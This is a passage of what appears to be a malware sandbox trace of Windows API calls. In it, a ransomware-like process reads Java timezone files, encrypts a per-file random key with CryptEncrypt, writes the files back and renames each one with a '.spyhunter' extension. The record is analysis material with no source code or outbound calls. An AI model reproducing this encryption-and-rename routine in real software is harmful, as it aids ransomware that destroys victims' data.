dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.518] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao") returned 59 [0171.518] StrStrW (lpFirst="Curacao", lpSrch=".txt") returned 0x0 [0171.518] GetProcessHeap () returned 0x2c0000 [0171.518] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.518] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e53c*=0x4d, lpOverlapped=0x0) returned 1 [0171.520] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.520] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x270e53c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e53c*=0x4d, lpOverlapped=0x0) returned 1 [0171.520] GetProcessHeap () returned 0x2c0000 [0171.520] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.520] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.520] WriteFile (in: hFile=0x9c, lpBuffer=0x270e57c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e53c, lpOverlapped=0x0 | out: lpBuffer=0x270e57c*, lpNumberOfBytesWritten=0x270e53c*=0x4, lpOverlapped=0x0) returned 1 [0171.520] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e53c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e53c*=0x30, lpOverlapped=0x0) returned 1 [0171.520] CloseHandle (hObject=0x9c) returned 1 [0171.520] GetProcessHeap () returned 0x2c0000 [0171.520] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.520] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao.spyhunter") returned 69 [0171.521] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Curacao.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\curacao.spyhunter")) returned 1 [0171.522] GetProcessHeap () returned 0x2c0000 [0171.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.522] GetProcessHeap () returned 0x2c0000 [0171.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.522] GetProcessHeap () returned 0x2c0000 [0171.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60b40 | out: hHeap=0x2c0000) returned 1 [0171.522] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e578 | out: pbBuffer=0x270e578) returned 1 [0171.522] GetProcessHeap () returned 0x2c0000 [0171.522] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.522] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e570*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e570*=0x30) returned 1 [0171.522] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.524] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba") returned 58 [0171.524] StrStrW (lpFirst="Cuiaba", lpSrch=".txt") returned 0x0 [0171.524] GetProcessHeap () returned 0x2c0000 [0171.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.524] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e534, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e534*=0x44c, lpOverlapped=0x0) returned 1 [0171.575] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffbb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.575] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x44c, lpNumberOfBytesWritten=0x270e534, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e534*=0x44c, lpOverlapped=0x0) returned 1 [0171.575] GetProcessHeap () returned 0x2c0000 [0171.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.575] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.575] WriteFile (in: hFile=0x9c, lpBuffer=0x270e574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e534, lpOverlapped=0x0 | out: lpBuffer=0x270e574*, lpNumberOfBytesWritten=0x270e534*=0x4, lpOverlapped=0x0) returned 1 [0171.575] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e534, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e534*=0x30, lpOverlapped=0x0) returned 1 [0171.575] CloseHandle (hObject=0x9c) returned 1 [0171.575] GetProcessHeap () returned 0x2c0000 [0171.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.576] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba.spyhunter") returned 68 [0171.576] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Cuiaba.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\cuiaba.spyhunter")) returned 1 [0171.577] GetProcessHeap () returned 0x2c0000 [0171.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.577] GetProcessHeap () returned 0x2c0000 [0171.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.577] GetProcessHeap () returned 0x2c0000 [0171.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60a80 | out: hHeap=0x2c0000) returned 1 [0171.577] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e578 | out: pbBuffer=0x270e578) returned 1 [0171.577] GetProcessHeap () returned 0x2c0000 [0171.577] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.577] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e570*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e570*=0x30) returned 1 [0171.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.579] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande") returned 64 [0171.579] StrStrW (lpFirst="Campo_Grande", lpSrch=".txt") returned 0x0 [0171.579] GetProcessHeap () returned 0x2c0000 [0171.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.579] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e534, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e534*=0x45c, lpOverlapped=0x0) returned 1 [0171.697] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffba4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.698] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x270e534, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e534*=0x45c, lpOverlapped=0x0) returned 1 [0171.698] GetProcessHeap () returned 0x2c0000 [0171.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.698] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.698] WriteFile (in: hFile=0x9c, lpBuffer=0x270e574*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e534, lpOverlapped=0x0 | out: lpBuffer=0x270e574*, lpNumberOfBytesWritten=0x270e534*=0x4, lpOverlapped=0x0) returned 1 [0171.698] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e534, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e534*=0x30, lpOverlapped=0x0) returned 1 [0171.698] CloseHandle (hObject=0x9c) returned 1 [0171.698] GetProcessHeap () returned 0x2c0000 [0171.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.698] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande.spyhunter") returned 74 [0171.698] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Campo_Grande.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\campo_grande.spyhunter")) returned 1 [0171.699] GetProcessHeap () returned 0x2c0000 [0171.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.699] GetProcessHeap () returned 0x2c0000 [0171.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.699] GetProcessHeap () returned 0x2c0000 [0171.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e041d8 | out: hHeap=0x2c0000) returned 1 [0171.699] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e570 | out: pbBuffer=0x270e570) returned 1 [0171.699] GetProcessHeap () returned 0x2c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.700] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e568*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e568*=0x30) returned 1 [0171.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.700] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota") returned 58 [0171.700] StrStrW (lpFirst="Bogota", lpSrch=".txt") returned 0x0 [0171.700] GetProcessHeap () returned 0x2c0000 [0171.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0171.700] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e52c*=0x59, lpOverlapped=0x0) returned 1 [0171.701] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffa7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.701] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x59, lpNumberOfBytesWritten=0x270e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e52c*=0x59, lpOverlapped=0x0) returned 1 [0171.701] GetProcessHeap () returned 0x2c0000 [0171.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0171.701] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.702] WriteFile (in: hFile=0x9c, lpBuffer=0x270e56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e52c, lpOverlapped=0x0 | out: lpBuffer=0x270e56c*, lpNumberOfBytesWritten=0x270e52c*=0x4, lpOverlapped=0x0) returned 1 [0171.702] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e52c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e52c*=0x30, lpOverlapped=0x0) returned 1 [0171.702] CloseHandle (hObject=0x9c) returned 1 [0171.702] GetProcessHeap () returned 0x2c0000 [0171.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.702] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota.spyhunter") returned 68 [0171.702] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bogota.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bogota.spyhunter")) returned 1 [0171.703] GetProcessHeap () returned 0x2c0000 [0171.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.703] GetProcessHeap () returned 0x2c0000 [0171.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.703] GetProcessHeap () returned 0x2c0000 [0171.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60480 | out: hHeap=0x2c0000) returned 1 [0171.703] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e570 | out: pbBuffer=0x270e570) returned 1 [0171.703] GetProcessHeap () returned 0x2c0000 [0171.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.703] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e568*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e568*=0x30) returned 1 [0171.703] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0171.727] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista") returned 61 [0171.727] StrStrW (lpFirst="Boa_Vista", lpSrch=".txt") returned 0x0 [0171.727] GetProcessHeap () returned 0x2c0000 [0171.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.727] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e52c*=0x149, lpOverlapped=0x0) returned 1 [0171.727] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffeb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.728] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x149, lpNumberOfBytesWritten=0x270e52c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e52c*=0x149, lpOverlapped=0x0) returned 1 [0171.728] GetProcessHeap () returned 0x2c0000 [0171.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.728] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.728] WriteFile (in: hFile=0x9c, lpBuffer=0x270e56c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e52c, lpOverlapped=0x0 | out: lpBuffer=0x270e56c*, lpNumberOfBytesWritten=0x270e52c*=0x4, lpOverlapped=0x0) returned 1 [0171.728] WriteFile (in: hFile=0x9c, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e52c, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e52c*=0x30, lpOverlapped=0x0) returned 1 [0171.728] CloseHandle (hObject=0x9c) returned 1 [0171.728] GetProcessHeap () returned 0x2c0000 [0171.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0171.728] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista.spyhunter") returned 71 [0171.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Boa_Vista.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\boa_vista.spyhunter")) returned 1 [0171.729] GetProcessHeap () returned 0x2c0000 [0171.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0171.729] GetProcessHeap () returned 0x2c0000 [0171.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.729] GetProcessHeap () returned 0x2c0000 [0171.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc0050 | out: hHeap=0x2c0000) returned 1 [0171.730] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e568 | out: pbBuffer=0x270e568) returned 1 [0171.730] GetProcessHeap () returned 0x2c0000 [0171.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.730] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e560*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e560*=0x30) returned 1 [0171.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.732] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia") returned 57 [0171.732] StrStrW (lpFirst="Bahia", lpSrch=".txt") returned 0x0 [0171.732] GetProcessHeap () returned 0x2c0000 [0171.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.732] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e524, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e524*=0x229, lpOverlapped=0x0) returned 1 [0171.733] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.733] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x229, lpNumberOfBytesWritten=0x270e524, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e524*=0x229, lpOverlapped=0x0) returned 1 [0171.733] GetProcessHeap () returned 0x2c0000 [0171.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.733] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.733] WriteFile (in: hFile=0x178, lpBuffer=0x270e564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e524, lpOverlapped=0x0 | out: lpBuffer=0x270e564*, lpNumberOfBytesWritten=0x270e524*=0x4, lpOverlapped=0x0) returned 1 [0171.734] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e524, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e524*=0x30, lpOverlapped=0x0) returned 1 [0171.734] CloseHandle (hObject=0x178) returned 1 [0171.734] GetProcessHeap () returned 0x2c0000 [0171.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0171.734] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia.spyhunter") returned 67 [0171.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Bahia.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\bahia.spyhunter")) returned 1 [0171.735] GetProcessHeap () returned 0x2c0000 [0171.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0171.735] GetProcessHeap () returned 0x2c0000 [0171.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0171.735] GetProcessHeap () returned 0x2c0000 [0171.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60240 | out: hHeap=0x2c0000) returned 1 [0171.735] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e568 | out: pbBuffer=0x270e568) returned 1 [0171.735] GetProcessHeap () returned 0x2c0000 [0171.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0171.735] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e560*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e560*=0x30) returned 1 [0171.736] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\asuncion"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0171.737] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Asuncion") returned 60 [0171.737] StrStrW (lpFirst="Asuncion", lpSrch=".txt") returned 0x0 [0171.737] GetProcessHeap () returned 0x2c0000 [0171.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0171.737] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e524, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e524*=0x45c, lpOverlapped=0x0) returned 1 [0171.768] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffba4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0171.769] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0x270e524, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e524*=0x45c, lpOverlapped=0x0) returned 1 [0171.769] GetProcessHeap () returned 0x2c0000 [0171.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0171.769] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.769] WriteFile (in: hFile=0x178, lpBuffer=0x270e564*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e524, lpOverlapped=0x0 | out: lpBuffer=0x270e564*, lpNumberOfBytesWritten=0x270e524*=0x4, lpOverlapped=0x0) returned 1 [0171.769] WriteFile (in: hFile=0x178, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e524, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e524*=0x30, lpOverlapped=0x0) returned 1 [0171.769] CloseHandle (hObject=0x178) returned 1 [0171.769] GetProcessHeap () returned 0x2c0000 [0171.769] RtlAllocateHeap (HeapHandle=0x2c0000, 